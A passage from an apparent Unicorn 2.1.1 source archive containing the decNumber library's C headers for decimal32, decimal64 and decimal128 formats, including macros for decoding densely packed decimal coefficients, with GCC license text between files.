Units needed to hold d digits */ /* (runtime version, with table lookaside for small d) */ #if DECDPUN==8 #define D2U(d) ((unsigned)((d)<=DECMAXD2U?d2utable[d]:((d)+7)>>3)) #elif DECDPUN==4 #define D2U(d) ((unsigned)((d)<=DECMAXD2U?d2utable[d]:((d)+3)>>2)) #else #define D2U(d) ((d)<=DECMAXD2U?d2utable[d]:((d)+DECDPUN-1)/DECDPUN) #endif /* SD2U -- static D2U macro (for compile-time calculation) */ #define SD2U(d) (((d)+DECDPUN-1)/DECDPUN) /* MSUDIGITS -- returns digits in msu, from digits, calculated */ /* using D2U */ #define MSUDIGITS(d) ((d)-(D2U(d)-1)*DECDPUN) /* D2N -- return the number of decNumber structs that would be */ /* needed to contain that number of digits (and the initial */ /* decNumber struct) safely. Note that one Unit is included in the */ /* initial structure. Used for allocating space that is aligned on */ /* a decNumber struct boundary. */ #define D2N(d) \ ((((SD2U(d)-1)*sizeof(Unit))+sizeof(decNumber)*2-1)/sizeof(decNumber)) /* TODIGIT -- macro to remove the leading digit from the unsigned */ /* integer u at column cut (counting from the right, LSD=0) and */ /* place it as an ASCII character into the character pointed to by */ /* c. Note that cut must be <= 9, and the maximum value for u is */ /* 2,000,000,000 (as is needed for negative exponents of */ /* subnormals). The unsigned integer pow is used as a temporary */ /* variable. */ #define TODIGIT(u, cut, c, pow) { \ *(c)='0'; \ pow=DECPOWERS[cut]*2; \ if ((u)>pow) { \ pow*=4; \ if ((u)>=pow) {(u)-=pow; *(c)+=8;} \ pow/=2; \ if ((u)>=pow) {(u)-=pow; *(c)+=4;} \ pow/=2; \ } \ if ((u)>=pow) {(u)-=pow; *(c)+=2;} \ pow/=2; \ if ((u)>=pow) {(u)-=pow; *(c)+=1;} \ } /* ---------------------------------------------------------------- */ /* Definitions for fixed-precision modules (only valid after */ /* decSingle.h, decDouble.h, or decQuad.h has been included) */ /* ---------------------------------------------------------------- */ /* bcdnum -- a structure describing a format-independent finite */ /* number, whose coefficient is a string of bcd8 uBytes */ typedef struct { uByte *msd; /* -> most significant digit */ uByte *lsd; /* -> least ditto */ uInt sign; /* 0=positive, DECFLOAT_Sign=negative */ Int exponent; /* Unadjusted signed exponent (q), or */ /* DECFLOAT_NaN etc. for a special */ } bcdnum; /* Test if exponent or bcdnum exponent must be a special, etc. 
*/ #define EXPISSPECIAL(exp) ((exp)>=DECFLOAT_MinSp) #define EXPISINF(exp) (exp==DECFLOAT_Inf) #define EXPISNAN(exp) (exp==DECFLOAT_qNaN || exp==DECFLOAT_sNaN) #define NUMISSPECIAL(num) (EXPISSPECIAL((num)->exponent)) /* Refer to a 32-bit word or byte in a decFloat (df) by big-endian */ /* (array) notation (the 0 word or byte contains the sign bit), */ /* automatically adjusting for endianness; similarly address a word */ /* in the next-wider format (decFloatWider, or dfw) */ #define DECWORDS (DECBYTES/4) #define DECWWORDS (DECWBYTES/4) #if DECLITEND #define DFWORD(df, off) ((df)->words[DECWORDS-1-(off)]) #define DFBYTE(df, off) ((df)->bytes[DECBYTES-1-(off)]) #define DFWWORD(dfw, off) ((dfw)->words[DECWWORDS-1-(off)]) #else #define DFWORD(df, off) ((df)->words[off]) #define DFBYTE(df, off) ((df)->bytes[off]) #define DFWWORD(dfw, off) ((dfw)->words[off]) #endif /* Tests for sign or specials, directly on DECFLOATs */ #define DFISSIGNED(df) (DFWORD(df, 0)&0x80000000) #define DFISSPECIAL(df) ((DFWORD(df, 0)&0x78000000)==0x78000000) #define DFISINF(df) ((DFWORD(df, 0)&0x7c000000)==0x78000000) #define DFISNAN(df) ((DFWORD(df, 0)&0x7c000000)==0x7c000000) #define DFISQNAN(df) ((DFWORD(df, 0)&0x7e000000)==0x7c000000) #define DFISSNAN(df) ((DFWORD(df, 0)&0x7e000000)==0x7e000000) /* Shared lookup tables */ extern const uInt DECCOMBMSD[64]; /* Combination field -> MSD */ extern const uInt DECCOMBFROM[48]; /* exp+msd -> Combination */ /* Private generic (utility) routine */ #if DECCHECK || DECTRACE extern void decShowNum(const bcdnum *, const char *); #endif /* Format-dependent macros and constants */ #if defined(DECPMAX) /* Useful constants */ #define DECPMAX9 (ROUNDUP(DECPMAX, 9)/9) /* 'Pmax' in 10**9s */ /* Top words for a zero */ #define SINGLEZERO 0x22500000 #define DOUBLEZERO 0x22380000 #define QUADZERO 0x22080000 /* [ZEROWORD is defined to be one of these in the DFISZERO macro] */ /* Format-dependent common tests: */ /* DFISZERO -- test for (any) zero */ /* DFISCCZERO -- test for coefficient continuation being zero */ /* DFISCC01 -- test for coefficient contains only 0s and 1s */ /* DFISINT -- test for finite and exponent q=0 */ /* DFISUINT01 -- test for sign=0, finite, exponent q=0, and */ /* MSD=0 or 1 */ /* ZEROWORD is also defined here. */ /* In DFISZERO the first test checks the least-significant word */ /* (most likely to be non-zero); the penultimate tests MSD and */ /* DPDs in the signword, and the final test excludes specials and */ /* MSD>7. DFISINT similarly has to allow for the two forms of */ /* MSD codes. DFISUINT01 only has to allow for one form of MSD */ /* code. 
*/ #if DECPMAX==7 #define ZEROWORD SINGLEZERO /* [test macros not needed except for Zero] */ #define DFISZERO(df) ((DFWORD(df, 0)&0x1c0fffff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000) #elif DECPMAX==16 #define ZEROWORD DOUBLEZERO #define DFISZERO(df) ((DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x1c03ffff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000)) #define DFISINT(df) ((DFWORD(df, 0)&0x63fc0000)==0x22380000 \ ||(DFWORD(df, 0)&0x7bfc0000)==0x6a380000) #define DFISUINT01(df) ((DFWORD(df, 0)&0xfbfc0000)==0x22380000) #define DFISCCZERO(df) (DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x0003ffff)==0) #define DFISCC01(df) ((DFWORD(df, 0)&~0xfffc9124)==0 \ && (DFWORD(df, 1)&~0x49124491)==0) #elif DECPMAX==34 #define ZEROWORD QUADZERO #define DFISZERO(df) ((DFWORD(df, 3)==0 \ && DFWORD(df, 2)==0 \ && DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x1c003fff)==0 \ && (DFWORD(df, 0)&0x60000000)!=0x60000000)) #define DFISINT(df) ((DFWORD(df, 0)&0x63ffc000)==0x22080000 \ ||(DFWORD(df, 0)&0x7bffc000)==0x6a080000) #define DFISUINT01(df) ((DFWORD(df, 0)&0xfbffc000)==0x22080000) #define DFISCCZERO(df) (DFWORD(df, 3)==0 \ && DFWORD(df, 2)==0 \ && DFWORD(df, 1)==0 \ && (DFWORD(df, 0)&0x00003fff)==0) #define DFISCC01(df) ((DFWORD(df, 0)&~0xffffc912)==0 \ && (DFWORD(df, 1)&~0x44912449)==0 \ && (DFWORD(df, 2)&~0x12449124)==0 \ && (DFWORD(df, 3)&~0x49124491)==0) #endif /* Macros to test if a certain 10 bits of a uInt or pair of uInts */ /* are a canonical declet [higher or lower bits are ignored]. */ /* declet is at offset 0 (from the right) in a uInt: */ #define CANONDPD(dpd) (((dpd)&0x300)==0 || ((dpd)&0x6e)!=0x6e) /* declet is at offset k (a multiple of 2) in a uInt: */ #define CANONDPDOFF(dpd, k) (((dpd)&(0x300<<(k)))==0 \ || ((dpd)&(((uInt)0x6e)<<(k)))!=(((uInt)0x6e)<<(k))) /* declet is at offset k (a multiple of 2) in a pair of uInts: */ /* [the top 2 bits will always be in the more-significant uInt] */ #define CANONDPDTWO(hi, lo, k) (((hi)&(0x300>>(32-(k))))==0 \ || ((hi)&(0x6e>>(32-(k))))!=(0x6e>>(32-(k))) \ || ((lo)&(((uInt)0x6e)<<(k)))!=(((uInt)0x6e)<<(k))) /* Macro to test whether a full-length (length DECPMAX) BCD8 */ /* coefficient is zero */ /* test just the LSWord first, then the remainder */ #if DECPMAX==7 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && UINTAT((u)+DECPMAX-7)==0) #elif DECPMAX==16 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && (UINTAT((u)+DECPMAX-8)+UINTAT((u)+DECPMAX-12) \ +UINTAT((u)+DECPMAX-16))==0) #elif DECPMAX==34 #define ISCOEFFZERO(u) (UINTAT((u)+DECPMAX-4)==0 \ && (UINTAT((u)+DECPMAX-8) +UINTAT((u)+DECPMAX-12) \ +UINTAT((u)+DECPMAX-16)+UINTAT((u)+DECPMAX-20) \ +UINTAT((u)+DECPMAX-24)+UINTAT((u)+DECPMAX-28) \ +UINTAT((u)+DECPMAX-32)+USHORTAT((u)+DECPMAX-34))==0) #endif /* Macros and masks for the exponent continuation field and MSD */ /* Get the exponent continuation from a decFloat *df as an Int */ #define GETECON(df) ((Int)((DFWORD((df), 0)&0x03ffffff)>>(32-6-DECECONL))) /* Ditto, from the next-wider format */ #define GETWECON(df) ((Int)((DFWWORD((df), 0)&0x03ffffff)>>(32-6-DECWECONL))) /* Get the biased exponent similarly */ #define GETEXP(df) ((Int)(DECCOMBEXP[DFWORD((df), 0)>>26]+GETECON(df))) /* Get the unbiased exponent similarly */ #define GETEXPUN(df) ((Int)GETEXP(df)-DECBIAS) /* Get the MSD similarly (as uInt) */ #define GETMSD(df) (DECCOMBMSD[DFWORD((df), 0)>>26]) /* Compile-time computes of the exponent continuation field masks */ /* full exponent continuation field: */ #define ECONMASK ((0x03ffffff>>(32-6-DECECONL))<<(32-6-DECECONL)) /* same, not including 
its first digit (the qNaN/sNaN selector): */ #define ECONNANMASK ((0x01ffffff>>(32-6-DECECONL))<<(32-6-DECECONL)) /* Macros to decode the coefficient in a finite decFloat *df into */ /* a BCD string (uByte *bcdin) of length DECPMAX uBytes */ /* In-line sequence to convert 10 bits at right end of uInt dpd */ /* to three BCD8 digits starting at uByte u. Note that an extra */ /* byte is written to the right of the three digits because this */ /* moves four at a time for speed; the alternative macro moves */ /* exactly three bytes */ #define dpd2bcd8(u, dpd) { \ UINTAT(u)=UINTAT(&DPD2BCD8[((dpd)&0x3ff)*4]);} #define dpd2bcd83(u, dpd) { \ *(u)=DPD2BCD8[((dpd)&0x3ff)*4]; \ *(u+1)=DPD2BCD8[((dpd)&0x3ff)*4+1]; \ *(u+2)=DPD2BCD8[((dpd)&0x3ff)*4+2];} /* Decode the declets. After extracting each one, it is decoded */ /* to BCD8 using a table lookup (also used for variable-length */ /* decode). Each DPD decode is 3 bytes BCD8 plus a one-byte */ /* length which is not used, here). Fixed-length 4-byte moves */ /* are fast, however, almost everywhere, and so are used except */ /* for the final three bytes (to avoid overrun). The code below */ /* is 36 instructions for Doubles and about 70 for Quads, even */ /* on IA32. */ /* Two macros are defined for each format: */ /* GETCOEFF extracts the coefficient of the current format */ /* GETWCOEFF extracts the coefficient of the next-wider format. */ /* The latter is a copy of the next-wider GETCOEFF using DFWWORD. */ #if DECPMAX==7 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>10); \ dpd2bcd83(bcd+4, sourhi);} #define GETWCOEFF(df, bcd) { \ uInt sourhi=DFWWORD(df, 0); \ uInt sourlo=DFWWORD(df, 1); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>8); \ dpd2bcd8(bcd+4, (sourhi<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+7, sourlo>>20); \ dpd2bcd8(bcd+10, sourlo>>10); \ dpd2bcd83(bcd+13, sourlo);} #elif DECPMAX==16 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ uInt sourlo=DFWORD(df, 1); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>8); \ dpd2bcd8(bcd+4, (sourhi<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+7, sourlo>>20); \ dpd2bcd8(bcd+10, sourlo>>10); \ dpd2bcd83(bcd+13, sourlo);} #define GETWCOEFF(df, bcd) { \ uInt sourhi=DFWWORD(df, 0); \ uInt sourmh=DFWWORD(df, 1); \ uInt sourml=DFWWORD(df, 2); \ uInt sourlo=DFWWORD(df, 3); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>4); \ dpd2bcd8(bcd+4, ((sourhi)<<6) | (sourmh>>26)); \ dpd2bcd8(bcd+7, sourmh>>16); \ dpd2bcd8(bcd+10, sourmh>>6); \ dpd2bcd8(bcd+13, ((sourmh)<<4) | (sourml>>28)); \ dpd2bcd8(bcd+16, sourml>>18); \ dpd2bcd8(bcd+19, sourml>>8); \ dpd2bcd8(bcd+22, ((sourml)<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+25, sourlo>>20); \ dpd2bcd8(bcd+28, sourlo>>10); \ dpd2bcd83(bcd+31, sourlo);} #elif DECPMAX==34 #define GETCOEFF(df, bcd) { \ uInt sourhi=DFWORD(df, 0); \ uInt sourmh=DFWORD(df, 1); \ uInt sourml=DFWORD(df, 2); \ uInt sourlo=DFWORD(df, 3); \ *(bcd)=(uByte)DECCOMBMSD[sourhi>>26]; \ dpd2bcd8(bcd+1, sourhi>>4); \ dpd2bcd8(bcd+4, ((sourhi)<<6) | (sourmh>>26)); \ dpd2bcd8(bcd+7, sourmh>>16); \ dpd2bcd8(bcd+10, sourmh>>6); \ dpd2bcd8(bcd+13, ((sourmh)<<4) | (sourml>>28)); \ dpd2bcd8(bcd+16, sourml>>18); \ dpd2bcd8(bcd+19, sourml>>8); \ dpd2bcd8(bcd+22, ((sourml)<<2) | (sourlo>>30)); \ dpd2bcd8(bcd+25, sourlo>>20); \ dpd2bcd8(bcd+28, sourlo>>10); \ dpd2bcd83(bcd+31, sourlo);} #define GETWCOEFF(df, bcd) {??} /* [should never be used] */ #endif /* Macros to decode the coefficient in a 
finite decFloat *df into */ /* a base-billion uInt array, with the least-significant */ /* 0-999999999 'digit' at offset 0. */ /* Decode the declets. After extracting each one, it is decoded */ /* to binary using a table lookup. Three tables are used; one */ /* the usual DPD to binary, the other two pre-multiplied by 1000 */ /* and 1000000 to avoid multiplication during decode. These */ /* tables can also be used for multiplying up the MSD as the DPD */ /* code for 0 through 9 is the identity. */ #define DPD2BIN0 DPD2BIN /* for prettier code */ #if DECPMAX==7 #define GETCOEFFBILL(df, buf) { \ uInt sourhi=DFWORD(df, 0); \ (buf)[0]=DPD2BIN0[sourhi&0x3ff] \ +DPD2BINK[(sourhi>>10)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #elif DECPMAX==16 #define GETCOEFFBILL(df, buf) { \ uInt sourhi, sourlo; \ sourlo=DFWORD(df, 1); \ (buf)[0]=DPD2BIN0[sourlo&0x3ff] \ +DPD2BINK[(sourlo>>10)&0x3ff] \ +DPD2BINM[(sourlo>>20)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[1]=DPD2BIN0[((sourhi<<2) | (sourlo>>30))&0x3ff] \ +DPD2BINK[(sourhi>>8)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #elif DECPMAX==34 #define GETCOEFFBILL(df, buf) { \ uInt sourhi, sourmh, sourml, sourlo; \ sourlo=DFWORD(df, 3); \ (buf)[0]=DPD2BIN0[sourlo&0x3ff] \ +DPD2BINK[(sourlo>>10)&0x3ff] \ +DPD2BINM[(sourlo>>20)&0x3ff]; \ sourml=DFWORD(df, 2); \ (buf)[1]=DPD2BIN0[((sourml<<2) | (sourlo>>30))&0x3ff] \ +DPD2BINK[(sourml>>8)&0x3ff] \ +DPD2BINM[(sourml>>18)&0x3ff]; \ sourmh=DFWORD(df, 1); \ (buf)[2]=DPD2BIN0[((sourmh<<4) | (sourml>>28))&0x3ff] \ +DPD2BINK[(sourmh>>6)&0x3ff] \ +DPD2BINM[(sourmh>>16)&0x3ff]; \ sourhi=DFWORD(df, 0); \ (buf)[3]=DPD2BIN0[((sourhi<<6) | (sourmh>>26))&0x3ff] \ +DPD2BINK[(sourhi>>4)&0x3ff] \ +DPD2BINM[DECCOMBMSD[sourhi>>26]];} #endif /* Macros to decode the coefficient in a finite decFloat *df into */ /* a base-thousand uInt array, with the least-significant 0-999 */ /* 'digit' at offset 0. */ /* Decode the declets. After extracting each one, it is decoded */ /* to binary using a table lookup. 
*/

#if DECPMAX==7
#define GETCOEFFTHOU(df, buf) {                             \
  uInt sourhi=DFWORD(df, 0);                                \
  (buf)[0]=DPD2BIN[sourhi&0x3ff];                           \
  (buf)[1]=DPD2BIN[(sourhi>>10)&0x3ff];                     \
  (buf)[2]=DECCOMBMSD[sourhi>>26];}
#elif DECPMAX==16
#define GETCOEFFTHOU(df, buf) {                             \
  uInt sourhi, sourlo;                                      \
  sourlo=DFWORD(df, 1);                                     \
  (buf)[0]=DPD2BIN[sourlo&0x3ff];                           \
  (buf)[1]=DPD2BIN[(sourlo>>10)&0x3ff];                     \
  (buf)[2]=DPD2BIN[(sourlo>>20)&0x3ff];                     \
  sourhi=DFWORD(df, 0);                                     \
  (buf)[3]=DPD2BIN[((sourhi<<2) | (sourlo>>30))&0x3ff];     \
  (buf)[4]=DPD2BIN[(sourhi>>8)&0x3ff];                      \
  (buf)[5]=DECCOMBMSD[sourhi>>26];}
#elif DECPMAX==34
#define GETCOEFFTHOU(df, buf) {                             \
  uInt sourhi, sourmh, sourml, sourlo;                      \
  sourlo=DFWORD(df, 3);                                     \
  (buf)[0]=DPD2BIN[sourlo&0x3ff];                           \
  (buf)[1]=DPD2BIN[(sourlo>>10)&0x3ff];                     \
  (buf)[2]=DPD2BIN[(sourlo>>20)&0x3ff];                     \
  sourml=DFWORD(df, 2);                                     \
  (buf)[3]=DPD2BIN[((sourml<<2) | (sourlo>>30))&0x3ff];     \
  (buf)[4]=DPD2BIN[(sourml>>8)&0x3ff];                      \
  (buf)[5]=DPD2BIN[(sourml>>18)&0x3ff];                     \
  sourmh=DFWORD(df, 1);                                     \
  (buf)[6]=DPD2BIN[((sourmh<<4) | (sourml>>28))&0x3ff];     \
  (buf)[7]=DPD2BIN[(sourmh>>6)&0x3ff];                      \
  (buf)[8]=DPD2BIN[(sourmh>>16)&0x3ff];                     \
  sourhi=DFWORD(df, 0);                                     \
  (buf)[9]=DPD2BIN[((sourhi<<6) | (sourmh>>26))&0x3ff];     \
  (buf)[10]=DPD2BIN[(sourhi>>4)&0x3ff];                     \
  (buf)[11]=DECCOMBMSD[sourhi>>26];}
#endif

/* Set a decFloat to the maximum positive finite number (Nmax) */
#if DECPMAX==7
#define DFSETNMAX(df) \
  {DFWORD(df, 0)=0x77f3fcff;}
#elif DECPMAX==16
#define DFSETNMAX(df)          \
  {DFWORD(df, 0)=0x77fcff3f;   \
   DFWORD(df, 1)=0xcff3fcff;}
#elif DECPMAX==34
#define DFSETNMAX(df)          \
  {DFWORD(df, 0)=0x77ffcff3;   \
   DFWORD(df, 1)=0xfcff3fcf;   \
   DFWORD(df, 2)=0xf3fcff3f;   \
   DFWORD(df, 3)=0xcff3fcff;}
#endif

/* [end of format-dependent macros and constants] */
#endif

#endif

/* ------------------------------------------------------------------ */
/* File: unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal128.h      */
/* ------------------------------------------------------------------ */

/* Decimal 128-bit format module header for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.
In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 128-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL128_H #define DECIMAL128_H #define DEC128NAME "decimal128" /* Short name */ #define DEC128FULLNAME "Decimal 128-bit Number" /* Verbose name */ #define DEC128AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal128s */ #define DECIMAL128_Bytes 16 /* length */ #define DECIMAL128_Pmax 34 /* maximum precision (digits) */ #define DECIMAL128_Emax 6144 /* maximum adjusted exponent */ #define DECIMAL128_Emin -6143 /* minimum adjusted exponent */ #define DECIMAL128_Bias 6176 /* bias for the exponent */ #define DECIMAL128_String 43 /* maximum string length, +1 */ #define DECIMAL128_EconL 12 /* exp. continuation length */ /* highest biased exponent (Elimit-1) */ #define DECIMAL128_Ehigh (DECIMAL128_Emax+DECIMAL128_Bias-DECIMAL128_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL128_Pmax) #error decimal128.h needs pre-defined DECNUMDIGITS>=34 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL128_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 128-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL128_Bytes]; /* decimal128: 1, 5, 12, 110 bits*/ } decimal128; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif #include "decimal128Local.h" /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal128 * decimal128FromString(decimal128 *, const char *, decContext *); char * decimal128ToString(const decimal128 *, char *); char * decimal128ToEngString(const decimal128 *, char *); /* decNumber conversions */ decimal128 * decimal128FromNumber(decimal128 *, const decNumber *, decContext *); decNumber * decimal128ToNumber(const decimal128 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal128IsCanonical(const decimal128 *); decimal128 * decimal128Canonical(decimal128 *, const decimal128 *); #endif 
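
/*
 * Illustrative round-trip (editorial sketch, not part of the original
 * header).  It assumes decContextDefault() and DEC_INIT_DECIMAL128 from
 * decContext.h (pulled in via decNumber.h); the function name is
 * hypothetical.  Kept under #if 0 so the header itself is unchanged for
 * the compiler.
 */
#if 0
static void example_decimal128_roundtrip(void)
{
    decContext ctx;
    decimal128 d;
    char buf[DECIMAL128_String];

    decContextDefault(&ctx, DEC_INIT_DECIMAL128); /* 34-digit context */
    decimal128FromString(&d, "123.45", &ctx);     /* text -> DPD encoding */
    decimal128ToString(&d, buf);                  /* DPD encoding -> text */
}
#endif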
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal128Local.h���������������������������������������0000664�0000000�0000000�00000003524�14675241067�0023761�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Local definitions for use with the decNumber C Library. Copyright (C) 2007 Free Software Foundation, Inc. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #if !defined(DECIMAL128LOCAL) /* The compiler needs sign manipulation functions for decimal128 which are not part of the decNumber package. */ /* Set sign; this assumes the sign was previously zero. */ #define decimal128SetSign(d,b) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] |= ((unsigned) (b) << 7); } /* Clear sign. */ #define decimal128ClearSign(d) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] &= ~0x80; } /* Flip sign. */ #define decimal128FlipSign(d) \ { (d)->bytes[WORDS_BIGENDIAN ? 0 : 15] ^= 0x80; } #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal32.h���������������������������������������������0000664�0000000�0000000�00000010011�14675241067�0022705�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 32-bit format module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. 
Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 32-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL32_H #define DECIMAL32_H #define DEC32NAME "decimal32" /* Short name */ #define DEC32FULLNAME "Decimal 32-bit Number" /* Verbose name */ #define DEC32AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal32s */ #define DECIMAL32_Bytes 4 /* length */ #define DECIMAL32_Pmax 7 /* maximum precision (digits) */ #define DECIMAL32_Emax 96 /* maximum adjusted exponent */ #define DECIMAL32_Emin -95 /* minimum adjusted exponent */ #define DECIMAL32_Bias 101 /* bias for the exponent */ #define DECIMAL32_String 15 /* maximum string length, +1 */ #define DECIMAL32_EconL 6 /* exp. 
continuation length */ /* highest biased exponent (Elimit-1) */ #define DECIMAL32_Ehigh (DECIMAL32_Emax+DECIMAL32_Bias-DECIMAL32_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL32_Pmax) #error decimal32.h needs pre-defined DECNUMDIGITS>=7 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL32_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 32-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL32_Bytes]; /* decimal32: 1, 5, 6, 20 bits*/ } decimal32; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal32 * decimal32FromString(decimal32 *, const char *, decContext *); char * decimal32ToString(const decimal32 *, char *); char * decimal32ToEngString(const decimal32 *, char *); /* decNumber conversions */ decimal32 * decimal32FromNumber(decimal32 *, const decNumber *, decContext *); decNumber * decimal32ToNumber(const decimal32 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal32IsCanonical(const decimal32 *); decimal32 * decimal32Canonical(decimal32 *, const decimal32 *); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal64.h���������������������������������������������0000664�0000000�0000000�00000010041�14675241067�0022715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 64-bit format module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) 
